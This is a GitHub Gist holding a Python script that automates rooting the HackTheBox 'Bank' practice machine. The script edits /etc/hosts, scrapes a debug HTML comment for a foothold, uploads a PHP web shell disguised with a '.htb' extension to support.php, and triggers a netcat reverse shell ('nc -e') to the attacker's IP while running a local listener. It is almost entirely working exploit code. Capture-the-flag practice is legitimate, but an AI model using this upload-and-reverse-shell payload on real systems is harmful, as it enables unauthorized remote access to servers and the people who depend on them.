Last active
June 5, 2023 17:20
-
-
Save dipa96/d509ea39d1c00dcf5e736a8b72885ee6 to your computer and use it in GitHub Desktop.
Auto-Root Python script for HTB Bank machine from HackTheBox
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3.9 | |
""" | |
htb_bank.py | |
Author: Donato Di Pasquale (dipa) | |
Description: Auto-Root Python script for HTB Bank machine from HackTheBox | |
Tech Stack Info: Support python3.9 and below | |
Usage: sudo python3.9 htb_bank.py -t <target> -i <your ip> | |
""" | |
import argparse | |
import requests | |
from bs4 import BeautifulSoup, Comment | |
import secrets | |
import subprocess | |
import threading | |
import time | |
import colorama | |
from colorama import Fore | |
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} | |
def parse_arguments(): | |
parser = argparse.ArgumentParser(description="HackTheBox Bank Exploit, run this exploit as root") | |
parser.add_argument("-t", "--target", type=str, help="") | |
parser.add_argument("-i", "--ips", type=str, help="Your Host") | |
args = parser.parse_args() | |
return args | |
""" | |
1. Check if host on port 80 is reachable. -> checkHost() | |
2. Setting up bank.htb in /etc/hosts and delete them after script end. -> writeEtcHosts(args) | |
""" | |
def checkHost(args): | |
print(Fore.YELLOW + "[DEBUG] Target entered: " + args.target + Fore.RESET) | |
print(Fore.YELLOW + "[DEBUG] Send request to http://" + args.target + Fore.RESET) | |
req = requests.get("http://" + args.target, timeout=5) | |
if req.status_code == 200: | |
print(Fore.GREEN + "[OK] " + args.target + " Target status code 200 OK" + Fore.RESET) | |
else: | |
print(Fore.RED + "[ERROR] Target Not Found" + Fore.RESET) | |
return 1 | |
def writeEtcHosts(args): | |
dns = "bank.htb" | |
print(Fore.YELLOW + "[DEBUG] Try to setting up new dns record " + dns + " in /etc/hosts file") | |
try: | |
hosts = open("/etc/hosts", "a") | |
hosts.write(args.target + "\t" + dns + "\n") | |
except Exception as e: | |
print(Fore.RED + "[ERROR]", type(e).__name__) | |
if type(e).__name__ == "PermissionError": | |
print(Fore.RED + "[ERROR] Run this exploit as root!") | |
finally: | |
print(Fore.GREEN + "[OK] " + args.target + " successful added to /etc/hosts" + Fore.RESET) | |
return dns | |
""" | |
3. Print foothold in HTML. -> findingFoothold(args, dns) | |
4. Load reverse shell in file upload (.htb extension). -> exploit(args,dns) | |
5. Reverse Shell. -> exploit(args,dns) | |
""" | |
def findingFoothold(args, dns): | |
# Don't follow redirects | |
req = requests.get("http://" + dns + "/support.php", allow_redirects=False) | |
soup = BeautifulSoup(req.text, 'html.parser') | |
comments = soup.find_all(string=lambda string: isinstance(string, Comment)) | |
for comment in comments: | |
if "[DEBUG]" in comment: | |
print(Fore.BLUE + "[INFO] Suspicious comment in HTML: " + comment + Fore.RESET) | |
def exploit(args,dns): | |
print(Fore.YELLOW + "[DEBUG] Setting up PHP Reverse Shell" + Fore.RESET) | |
fileName = secrets.token_hex(nbytes=4) + ".htb" | |
print(Fore.YELLOW + "[DEBUG] Load file: " + fileName + Fore.RESET) | |
malicious_file = ("<?php exec(\'nc -e /var/htb/bin/emergency " + args.ips + " 1337\') ?>") | |
file = open(fileName,"w") | |
file.write(malicious_file) | |
file.close() | |
print(Fore.YELLOW + "[DEBUG] Setting up HTTP POST Request" + Fore.RESET) | |
files = {'fileToUpload': open(fileName,'rb')} | |
values = {'title':"test", 'message':'test', 'submitadd':''} | |
headers = {'Content-type': 'application/x-php'} | |
print(Fore.YELLOW + "[DEBUG] Send payload and waiting for reverse shell..."+ Fore.RESET) | |
req = requests.post("http://" + dns + "/support.php", files=files, data=values, verify=False) | |
def run_listener(): | |
nc_command = "nc -lnvp 1337" | |
nc_process = subprocess.Popen(nc_command, shell=True) | |
nc_process.wait() | |
def run_reverse(): | |
req = requests.get("http://" + dns + "/" + "/uploads/" + fileName) | |
listener_thread = threading.Thread(target=run_listener) | |
listener_thread.start() | |
run_reverse() | |
def main(): | |
args = parse_arguments() | |
checkHost(args) | |
dns = writeEtcHosts(args) | |
findingFoothold(args, dns) | |
exploit(args,dns) | |
if __name__ == '__main__': | |
main() | |
""" | |
Box URL: https://app.hackthebox.com/machines/Bank | |
Box writeup: https://0xdf.gitlab.io/2020/07/07/htb-bank.html | |
""" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment